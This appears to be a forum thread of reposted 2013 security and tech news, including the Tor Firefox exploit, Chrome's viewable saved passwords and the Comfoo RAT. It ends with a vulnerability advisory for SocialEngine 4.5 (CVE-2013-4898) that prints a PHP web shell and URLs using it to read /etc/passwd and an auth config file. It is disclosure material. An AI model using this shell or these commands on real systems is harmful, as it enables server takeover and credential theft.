pedestal and blade servers, as well as high-end workstations and storage appliances. Despite its flat performance on NPD's June snapshot of dollars spent on servers, Super Micro reported this week in its fourth fiscal quarter ending in June 30 that the company made $322.3 million in revenues, a 16.8 percent jump over the previous year. 7. Intel Intel's server components business landed the chip maker into the No. 7 spot for dollars spent on servers in June, according to NPD. The market research firm didn't identify one product; however, since early 2012, the company's Enterprise Platform and Services Division has rolled out eight new server platforms, giving white-box solution providers a host of new high-performance options for their purpose-built servers and appliances. According to NPD, Intel's share of dollars spent on servers in North America inched up a mere 0.2 points. 6. Dell As Dell deals with major turmoil in its leveraged buyout war between CEO Michael Dell and activist investor Carl Icahn, it's keeping its head in the server game. Like Lenovo, not one Dell server made NPD's top 10 servers ranked by dollars spent. But according to NPD, Dell's server business is up by a 0.6 percentage point -- inching up from 0.9 to 1.5 percent. All said and done, Dell's piece of the sales dollar pie shot up 60 percent, according to NPD. Not too shabby. 5. Lenovo No single Lenovo ThinkServer system catapulted the computer maker to the No. 5 spot. NPD didn't identify any systems, but then it hasn't been long since the computer maker began building ThinkServer systems; it was only November of last year that Lenovo's Enterprise Product Group announced its first servers, storage, networking and software products. One of its debut products was the ThinkServer TD330 tower server based on Intel's Xeon E5-2400 processors. The server supports up to 16 processor cores with the base unit starting at $929. When it comes to unit share, not dollar share, NPD reported that Lenovo continued to make the most gains, capturing 5 percent of HP's 6.2 percent unit share losses for June 2013. 4. Oracle Oracle can thank sales of its eight-core Sparc T4-2 server for ranking it No. 4 on NPD's server list. The Sparc T4-2 server isn't Oracle's latest or brawniest server, but it has found a sweet spot serving companies craving single- and multi-threaded enterprise applications. Oracle didn't budge from its standings last June, earning 2.8 percent of the dollar shares spent on servers in 2012-13, according to NPD. 3. Cisco Cisco Systems slid into the No. 3 spot for server market share dollars. According to NPD data, Cisco's share of the server sales' pie jumped 1.8 points from 10.3 to 12.1 percent. Cisco's success is tied to its cloud and VMware-friendly UCS B200 M3 blade server with beefed up networking and data center scalability, according to NPD. 2. IBM IBM's big server hit was its built-to-order BladeCenter servers that earned it NPD's No. 2 spot in dollar share of the server market. IBM's dollar share increase was the most impressive of the NPD pack, jumping 6.8 percentage points from 20.6 to 27.4. NPD reports IBM captured more than two-thirds of Hewlett-Packard's dollar share losses. 1. Hewlett-Packard Hewlett-Packard is both this month's biggest winner and loser. HP attracted a whopping 52 percent of dollars spent on servers and build-to-order (BTO) servers shipped in June, beating its next closest competitor IBM by over 20 percentage points, according NPD data of the North American server market. But, then there's the bad news. While HP rocked the server earnings dollar chart, its market share nosedived 10 percentage points compared to June 2012. HP's losses were the worst among those tracked by NPD for that time period. According to NPD, all of HP's competitors gained dollar market share or saw flat growth compared to the previous year. According to NPD, this June's biggest industry hit was HP's BTO ProLiant BL460c blade systems server with a list starting price of $2,950. Acum, nu stiu daca intr-adevar asta ar fi ordinea reala.. Sursa CRN.COM

More information is trickling out about a Firefox vulnerability used to compromise some users of the Tor network as speculation about the origin of the attack continues to swirl. While rumors of a compromise of the Tor network had begun to spread during the weekend, it appears now that the attack exploited a flaw in the Firefox browser, which is included in the Tor Browser Bundle. The vulnerability at the center of the controversy is MFSA 2013-53, which was patched in Firefox 22 and Firefox 17.07 ESR. According to the Tor Project, the following versions of the Tor Browser Bundle include a fix: 2.3.25-10 (released June 26, 2013) 2.4.15-alpha-1 (released June 26, 2013) 2.4.15-beta-1 (released July 8, 2013) 3.0alpha2 (released June 30, 2013) "In principle, all users of all Tor Browser Bundles earlier than the above versions are vulnerable," according to a security advisory from the Tor Project. "But in practice, it appears that only Windows users with vulnerable Firefox versions were actually exploitable by this attack." "It appears that TBB users on Linux and OS X, as well as users of LiveCD systems like Tails, were not exploited by this attack," the advisory continued. "The vulnerability allows arbitrary code execution, so an attacker could in principle take over the victim's computer. However, the observed version of the attack appears to collect the hostname and MAC address of the victim computer, send that to a remote webserver over a non-Tor connection, and then crash or exit. The attack appears to have been injected into (or by) various Tor hidden services, and it's reasonable to conclude that the attacker now has a list of vulnerable Tor users who visited those hidden services." News of the compromise followed the arrest in Ireland of Eric Eoin Marques. According to the Independent.ie, authorities in the U.S. are currently trying to have Marques extradited on child pornography charges. News reports have linked him to Freedom Hosting, a hidden service provider reachable through the Tor Network that has been accused of ties to child pornography in the past. Around midnight on Aug. 4 - just three days after Marques' Aug. 1 arrest, Tor was notified that a large number of hidden service addresses had disappeared from the Tor Network. Rumors quickly began to circulate that sites served by Freedom Hosting had been compromised with code designed to unmask the identity of anyone visiting them and sending the information back to an IP address in the Washington D.C.-area. The IP address has been linked to defense contractor SAIC [science Applications International Corporation]. In an analysis of the malware, researcher Vlad Tsyrklevich wrote that the payload connects to the IP address and sends it an HTTP request that includes the hostname and the MAC address of the local host. "Because this payload does not download or execute any secondary backdoor or commands it's very likely that this is being operated by an LEA [law enforcement agency] and not by blackhats," he wrote. "The revelations will prove worrying for many legitimate Tor users, who rely on the service to protect them from snooping by government agencies," blogged John Hawes, technical consultant and test team director at Virus Bulletin. "While it may sometimes be used for criminal purposes, Tor also often allows access to freedom of speech which might otherwise be denied to people in certain parts of the world." Sursa Securityweek.com

Ambiguity often abounds when it comes to the security requirements contained in contracts with software-as-a-service [saaS] vendors, but there are minimum steps users can take to get what they want, according to industry analyst firm Gartner Inc. The analyst firm is predicting that through 2015, 80 percent of IT procurement professionals will remain dissatisfied with SaaS contract language and protections relating to security. According to Gartner, SaaS contract often lack specificity when it comes to the maintenance of data confidentiality, data integrity and recovery after a data loss incident. Part of the problem, opined Gartner analyst Jay Heiser, may be that customers rarely have the leverage to demand substantive changes to SaaS contracts. Even in the cases where they do, it is still debatable how much impact this has on security, he said, adding that in highly-regulated businesses, cloud customers generally do look for specific contractual provisions. "SaaS customer security sophistication is steadily increasing," he told SecurityWeek. "The buyers are becoming more realistic on what they can and cannot put into a contract, and they are becoming more aware of other, non-contractual ways that they can ensure appropriate use of SaaS." Earlier this year, a study by CA Technologies and Ponemon Institute found that just 51 percent of the 748 IT pros surveyed evaluated the security of SaaS applications prior to deployment. This was a slight increase from 2010, when the survey found that 45 percent did so. At a minimum, Gartner recommends cloud customers need to ensure SaaS contracts allow for an annual security audit and certification by a third-party and include the option to terminate the agreement if a breach occurs due to the provider failing to meet any important standards. The provider should also be able to meet the control objectives set by the Cloud Security Alliance's Cloud Controls Matrix. "As more buyers demand it, and as the standards mature, it will become increasingly common practice to perform assessments in a variety of ways, including reviewing responses to a questionnaire, reviewing third-party audit statements, conducting…on-site audits and/or monitoring the cloud services provider," Gartner analyst Alexa Bona said in a statement. Another issue is the lack of real financial compensation for losses of security, service or data, according to Gartner. "SaaS is a one-to-many situation in which a single service provider failure could impact thousands of customers simultaneously, so it represents a significant form of portfolio risk for the provider,” Bona said. "Therefore, the majority of cloud providers avoid contractual obligation for any form of compensation, other than providing service in kind or penalties in the event that they miss a service level in the contract. SaaS users should negotiate for 24 to 36 months of fee liability limits, rather than 12 months, and additional liability insurances, where possible." Interestingly, Heiser argued that contracts may be a less significant part of the overall risk control mix for SaaS than some assume when it compared to other more traditional forms of outsourcing. "In a one-on-one scenario, such as traditional hosting, you negotiate for a specific service," he said. "In a one-to-many scenario, such as SaaS, it isn’t practical to offer different levels of service to different customers, so providers are highly reluctant to agree to any substantive changes. However, the market puts huge incentives on cloud service providers to avoid security failure—much more so than traditional outsourcing. No CSP [cloud service provider] can afford the negative PR that would occur if thousands of customers were simultaneously impacted. This is abstract, a property that is very difficult to incorporate into a formal risk assessment, but this ‘market pressure’ is hard to deny." Still, a customer who wants to put highly-regulated data in the cloud needs more of a concrete justification that "those guys have a market incentive to protect my data," he said. "Buyers are looking to contractually provisions that might reduce the risk ambiguity, and they are looking for ways that the SaaS provider can share some of the risk," said Heiser. "Without getting into a debate about how high or low SaaS risk actually is, I personally do not expect any significant change in contractual practices in the near to medium term future." Sursa SecurityWeek.Com

RIGA - Latvia agreed Tuesday to extradite a programmer to the United States to stand trial for his alleged role in a global cyber theft ring that broke into a million computers. Latvian Deniss Calovskis, 27, and two other Europeans are suspected notably of hacking into computers at the US space agency NASA and of stealing online banking credentials for profit. Calovskis's lawyers said they would appeal the government's decision to the European Court of Human Rights, claiming their client would not receive a fair trial in the US. Around 30 friends and family members demonstrated outside the cabinet building as the ministers voted on the extradition request calling for Calovskis to be tried in Latvia, if at all. Fellow suspects, Russian Nikita Kuzmin and Romanian Mihai Ionut Paunescu, are already in custody. The trio are accused of using malicious computer code or malware, dubbed the "Gozi Virus", to infiltrate computers across Europe and the US. They caused "millions in losses by, among other things, stealing online banking credentials", according to the US federal prosecutor's office. Calovskis, alias "Miami", was arrested in Latvia in November 2012 and charged with writing some of the computer code in the Gozi Virus. He is suspected of using his expertise in programming to create "web injects", a code that alters how banking websites appear on infected computers, prompting victims to reveal personal information. Prosecutors say the sophisticated scam unfolded between 2005 and March 2012, adding that the virus was "virtually undetectable in the computers it infected". Financial losses from the virus stand "at a minimum, millions of dollars", according to the indictment. Sursa Securityweek.com

Presedintele SUA, Barack Obama, s-a declarat marti "dezamagit" de decizia Rusiei de a-i acorda azil provizoriu de un an fostului consultant al Agentiei de Securitate Nationala (NSA), Edward Snowden, dar a precizat ca, in pofida acestui fapt, va merge la summitul G20 de luna viitoare din Rusia, relateaza AFP, Reuters si RIA Novosti. "Am fost dezamagit intrucat, chiar daca nu am semnat un tratat de extradare cu ei (n.r. rusii), traditional am incercat sa respectam (cererile lor) daca cineva incalca legea sau presupunea incalcarea legii tarii lor", a declarat Obama, intr-o emisiune televizata marti seara la NBC. In cadrul aceleiasi emisiuni, Obama a indicat ca va participa la summitul G20 din septembrie de la Sankt Petersburg (Rusia), dar a refuzat sa precizeze daca va avea cu aceasta ocazie si o intalnire cu presedintele Vladimir Putin tete-a-tete. Anterior, Casa Alba a afirmat ca va evalua daca o intrevedere dintre cei doi sefi de stat mai are sens in conditiile date. Invitat in emisiunea "The Tonight Show" a lui Jay Leno, Obama a afirmat ca Moscova aluneca, uneori, intr-o mentalitate a razboiului rece, potrivit Reuters. "Sunt momente cand ei (n.r. rusii) aluneca in gandirea si mentalitatea razboiului rece. Ceea ce ii spun eu presedintelui Putin este ca totul e in trecut si ca trebuie sa ne gandim la viitor. Si nu exista niciun motiv pentru care noi nu suntem in masura sa cooperam mai eficient decat o facem in prezent", a afirmat liderul de la Casa Alba. "Voi merge la summitul G20 pentru ca acesta este principalul forum unde se poate vorbi de economie, de economie internationala, cu liderii principalelor economii din lume", a explicat el. Intalnirea oficiala Obama - Putin, sub semnul intrebarii Referitor la intalnirea la varf Obama - Putin inaintea summitului G20 de la Sankt-Petersburg, Washingtonul a lasat sa planeze dubii, legand implicit aceasta intrevedere de evolutia afacerii lui Edward Snowden, fostul consultant al serviciilor secrete americane care a dezvaluit un program de supraveghere electronica a comunicatiilor de catre guvernul SUA. Dupa ce a venit din Hong Kong, Snowden a fost mai mult de o luna practic blocat in zona de tranzit a aeroportului Seremetievo din Moscova. Washingtonul a cerut de mai multe ori expulzarea informaticianului in tara sa, unde este inculpat pentru spionaj dupa ce a facut dezvaluiri uluitoare despre supravegherea electronica efectuata de SUA la nivel mondial. Intre timp, conform agentiei ruse de presa RIA Novosti, rudele lui Snowden au depus documentele necesare pentru a le fi acordate vize in Rusia. Anterior, Anatoli Kucerena, avocatul lui Snowden, a declarat ca a trimis o invitatie tatalui fostului asistent tehnic al CIA. Potrivit avocatului, Snowden ar dori sa discute cu parintii planurile sale de viitor inainte de a incepe ceva in Rusia. Scandalul de spionaj informatic a afectat si relatiile SUA - Germania Germania a anulat acordurile privind schimbul de date cu SUA, Marea Britanie si Franta, incheiate in 1968, care permiteau serviciilor speciale ale acestor tari sa efectueze monitorizari pe teritoriul Germaniei, in urma scandalului de spionaj vizand un program de interceptari ale convorbirilor telefonice si pe internet, a relatat Russia Today, citand Deutsche Welle in limba rusa. Potrivit surselor citate, Ministerul german de Externe a trimis deja notificari in acest sens celor trei state. "Rezilierea contractelor din cauza evenimentelor din ultimele saptamani a devenit o consecinta necesara si adecvata a disputelor legate de protectia vietii private", a explicat ministrul german de externe Guido Westerwelle, citat de publicatia electronica Vzgliad. Acordurile privind schimbul de date au fost semnate de catre parti dupa adoptarea de catre Germania in 1968 a legii privind limitarea secretului corespondentei, precum si al comunicatiile postale si telefonice.Este vorba de asa-numita lege G10. Aceasta lege permite serviciilor de securitate verificarea a pana la 20% din astfel de comunicatii si conexiuni intre Germania si alte tari. Documentele respective permiteau in plus utilizarea datelor Biroului Federal pentru Protectia Constitutiei sau ale Serviciului Federal de Informatii german (BND) de catre cele trei tari. Sursa Business24.ro

Web browsers Google Chrome and Mozilla Firefox can reveal the logged-in user's saved website passwords in a few clicks. There now rages a debate over whether this is an alarming security flaw or a common feature. Picture this: you've been asked to fix a friend's PC because it's stopped printing pages properly, or you saunter past an office colleague's desk and notice her computer has been left unlocked. If the victim, shall we say, is using Chrome, surf over to chrome://settings/passwords, click on a starred-out saved website password and click on "Show"; rinse and repeat down the list. Voila, you can see his or her passwords in plain text. Blighty-based programmer Elliott Kember raised the issue this week on his blog and made a persuasive argument that it is a bug that needs fixing: Kember wants to Google's browser at least ask users for a password before displaying the credentials in plain text, or warn that they can be accessed in full with a few clicks. "At this stage, anything would be nice. They're not acknowledging the fact that millions and millions of Chrome users don't understand how this works," he told The Reg. "I'd like to never ever see passwords in plain text without authenticating myself first." Chrome's team lead Justin Schuh responded by arguing that if a miscreant has physical access to the computer then it's game over anyway, in terms of protecting the user's system. He added: Some will say the users need some top tips on securing their machines - such as not leaving it unlocked or in the case of a shared computer, not saving passwords. However, worldwide web granddaddy Tim Berners-Lee said the Chrome team's response was "disappointing" in a tweet: How to get all you big sister's passwords http://t.co/CpytKWH9aT and a disappointing reply from Chrome team. — Tim Berners-Lee (@timberners_lee) August 6, 2013 Going back to our earlier scenarios, if the user prefers Firefox, then open Preferences, hit the "Saved passwords" button in the security tab and then press "Show passwords". But bear in mind that a master password can be set to protect credentials stored in Mozilla's browser. The same goes for Opera, which also allows a master password to be set to encrypt the data on disk. Internet Explorer's saved passwords can be harvested using nimble Registry skills or a suitable third-party tool. And someone's written cross-browser JavaScript to extract saved passwords from an open page. Sursa TheRegister.co.uk

Those IP addresses we said belong to the NSA? We were probably wrong When Tor admitted early this week that some nodes on the network had suddenly and inexplicably gone dark, thanks in part to a malware attack, theories abounded as to just what was going on and why. That the FBI arrested a man suspected of using Tor to host child pornography distribution services further fuelled speculation that perhaps US authorities had launched an attack on Tor. Some infosec specialists quickly analysed the malware and suggested it was controlled by an entity using IP addresses associated with defence contractor Science Applications International Corporation (SAIC) and/or the NSA. One and one were promptly put together to suggest three elements explaining the Tor takedown: The arrest of porn suspect Eric Eoin Marques was but one action in a wider attack on Tor The US government, probably the NSA, created weaponised malware to take down Tor SAIC and/or the NSA were the source and/or controller of that malware A couple of days down the track, that theory is looking rocky, as two of the organisations that helped the malware theory to spread have issued a joint post saying their initial analysis of the malware was wrong. Cryptocloud and Baneki Privacy Labs write that their initial analysis of the IP addresses used by the “torsploit” probably don't have anything to do with SAIC. Cryptocloud's also less-than-certain it's earlier assertion that NSA IP addresses were involved is right. The post we've linked to above is long, rambling and suggests that even if it is not possible to find an IP address tied directly to the NSA in the Torsploit code, the incident looks an awful lot like the kind of thing the NSA is known to be capable of and interested in. Edward Snowden's recent revelations make it plain that the NSA is peering into a great may dark places. Tor's status as a likely gateway to much of the “dark web” means attempts to gain more intelligence on just what lies within the onion router seem well within the bounds of possibility. For now, however, the dots aren't joined. Nor, for what it is worth, is a decent explanation of where Torsploit came from or just how much damage it has done. ® Sursa TheRegister.co.uk

Este un pool, am votat apoi mi-am spus parerea.

Din cate stiu eu forumul se numeste Romanian Security Team, nu Romanian Pool Team.

Crew behind 'Comfoo' RAT may have rooted through videoconferencing vendor for ways to watch confidential meetings in government, businesses A Chinese hacker gang whose malware targeted RSA in 2011 infiltrated more than 100 companies and organizations, and was so eager to steal data that it probed a major teleconference developer to find new ways to spy on corporations, according to researchers. The remote-access Trojan, or RAT, tagged as "Comfoo" is largely inactive, said a pair of veteran researchers from Dell SecureWorks, who presented their findings at last week's Black Hat security conference. But their discoveries showed just how pervasively a dedicated group of attackers can infiltrate networks and walk away with secrets. "We're not seeing it used to the extent it was before," said Joe Stewart, director of malware research at SecureWorks, in explaining why he and his college, Don Jackson, revealed their undercover campaign. For more than 18 months, Stewart and Jackson, a senior security researcher with SecureWorks' Counter Threat Unit (CTU), secretly monitored some of the workings of Comfoo, which they believe was the work of a hacker crew they've named the Beijing Group. The gang is one of China's top-two hacker organizations. To start, Stewart captured a sample of the malware used in the RSA attack, at the time attributed to Chinese hackers, then reverse-engineered the encryption that the malware used to mask instructions to and from the gang's command-and-control (C&C) servers. Eventually, Stewart was able to spy on the hackers as they logged onto those C&C servers. As they did, Stewart snatched the victims' MAC addresses -- unique identifiers for network hardware -- their IP, or "Internet protocol" addresses, and finally, a tag the hackers used to label each data-stealing campaign. SecureWorks was not able to see what data the attackers were stealing, but their passive monitoring reaped dividends. "We've done similar ops like this before," said Stewart, "but with the custom stuff, you rarely get this kind of insight or this level of detail of the attacks and victims." SecureWorks said its stealthy stakeout -- which was intermittent to ensure that the hackers weren't aware they were watching -- uncovered over 100 victims, more than 64 different campaigns and 200-plus Comfoo variants. The Atlanta-based security firm notified some of the victims directly, and others through CERTs, the computer emergency response teams that governments maintain. "This was just a snapshot of the [total] victims," cautioned Stewart. The hackers targeted a wide range of government agencies and ministries, private companies and trade organizations in fields as diverse as energy, media, semiconductors and telecommunications. They seemed eager to grab information from almost anywhere and anyone, although the victims were concentrated in Japan, India, South Korea and the U.S. Sursa

Trust, Security On The Internet Could Fail When the most widely used encryption algorithms are broken, websites that support strong security to protect banking sessions could fail, opening them up to attack; online shopping sites that protect buyers by securing the transaction would be exposed to prying eyes; and VPNs, used by businesses to protect remote employees, would be exposed to attack. The fundamental trust mechanisms and digital certificates that authenticate users and validate software would be severely eroded, according to researchers at iSEC Partners, who spoke about the coming "cryptopocalypse" at the Black Hat 2013 security conference. The security experts said everyone who uses the Internet has a stake in ensuring that trust doesn't erode and security is maintained. Here are five ways to prepare. Public Key Cryptography: First, Understand The Challenge Public key cryptography, the current method used for secure communications and authentication on the Internet, is about to be broken, according to security researchers. Security experts from iSEC Partners said it could be cracked in the next five years. Current cryptosystems use either the RSA or Diffie-Hellman (DH) algorithms, which depend on discrete logarithm, a fundamental algebraic method, and factoring. Mathematicians are getting closer to breaking them, the researchers said. Making matters worse is the low cost of additional computational power, which speeds the process of finding a crack. Speaking to attendees at the Black Hat 2013 security conference, the researchers advocated a move to elliptic curve cryptography (ECC), which has remained at its full strength since it was first presented in 1985. Certificate Authorities Must Fuel ECC Adoption There's good news to report, according to the researchers. The transition from RSA digital certificates to ECC-based root certificates is taking place at major global certificate authorities, including Thawte, VeriSign, Entrust and Comodog. BlackBerry, which holds more than 100 ECC patents, uses it extensively. But, certificate authorities must make it easy to buy an ECC certificate, the researchers said. Certificate authorities need to update documentation and foster standards to avoid confusion. Getting The Word Out: A Call To Software Developers The security researchers said software developers need to call the function that supports ECC in their products, rather than the current method of calling the function that supports RSA. ECC is seen as more efficient and secure than the first-generation public key techniques. Software makers also need to support TLS 1.2 on the endpoints. New cryptosystems should support ECC, and old systems can be wrapped to support the newer cryptography. Some current implementations that support ECC are also poorly designed, causing some software to default to the RSA algorithm. The researchers are calling on operating system vendors to make ECC easier to use, with updated documentation to push developers away from RSA. What Should Businesses Do? Companies should survey their exposure, according to the security researchers. To prepare for an eventual crack of the encryption algorithm, use ECC certificates where possible. Businesses need to urge vendors to support TLS version 1.2 and ECC, the researchers said. They need to turn on support of the Elliptic Curve Ephemeral Diffie-Hellman algorithm that provides forward secrecy, a key-agreement protocol that can shield data from full disclosure if a private key is broken in the future. Patent Holders Must License ECC ECC's intellectual property has been cited as the main factor in slowing or stalling adoption, the researchers said. Currently, Certicom, a subsidiary of BlackBerry, holds more than 100 patents related to elliptic curves and public key cryptography. Researchers at security firm IOActive are urging BlackBerry to freely license implementations of Suite B. Suite B currently supports the Elliptic Curve Diffie-Hellman protocol. The National Security Agency purchased a license that covers all of its intellectual property in a restricted field of use and can be sublicensed to vendors building products that support ECC. Sursa CRN.COM

Buna miscare.

Description : This is the unsanitized version of the Firefox malicious javascript exploit that was targeting Tor users. It is suspected that this code was used by the FBI to gain identifying information on Tor users. Download : Download: Tor Firefox Malicious Javascript ? Packet Storm

Description : SocialEngine version 4.5 suffers from a remote shell upload vulnerability. Author : Wesley Henrique Leite Source : SocialEngine 4.5 Shell Upload ? Packet Storm Code : + INTRODUCTION ------------------------------------------------------------- The plugin has the objective give you a better visual for the user profile, allowed the addition of cover image keeping the layout closest to the style of modern social networks, among other features. + DESCRIPTION OF VULNERABILITY ------------------------------------------------------------- Logged into the system, enter on profile page of your user. [my profile] http://example.com/index.php/profile/[profile-name] >> Click "Change Cover" >> Click "Upload Cover" select the file "*.php" you want to send. //### Example PHP file to send "inject.php" ### <?php echo system("$_GET['cmd']"); ?> //### After selecting the file upload, this will be sent to an area temporarily, the system detects that the format is not valid, but doesn’t remove, allowing access later. an error message is displayed on the screen. [ File "/srv/www/htdocs/example.com/public/temporary/timeline/cover_original_8.php" is not an image or does not exist ] + ACCESS ------------------------------------------------------------- /srv/www/htdocs/example.com/public/temporary/timeline/cover_original_8.php The important thing is the structure of public forward, it will give us access to our archive. account operation system http://example.com/public/temporary/timeline/cover_original_8.php?cmd=cat%20/etc/passwd account credentials admin application http://example.com/public/temporary/timeline/cover_original_8.php?cmd=cat%20../../../install/config/auth.php ------------------------------------------------------------- + Discovered by: Wesley Henrique Leite ( wesleyhenrique (´) gmail (´) com ) + Software: SocialEngine 4.5 + Plugin Link: http://webhive.com.ua/store/product.php?id_product=46 + Plugin Name+Version : Timeline 4.2.5p9 + CVE-2013-4898 + REPORTED TO VENDOR JUL 17 2013 + PATCH RELEASED JUL 25 2013 ------------------------------------------------------------- -- Wesley Henrique Leite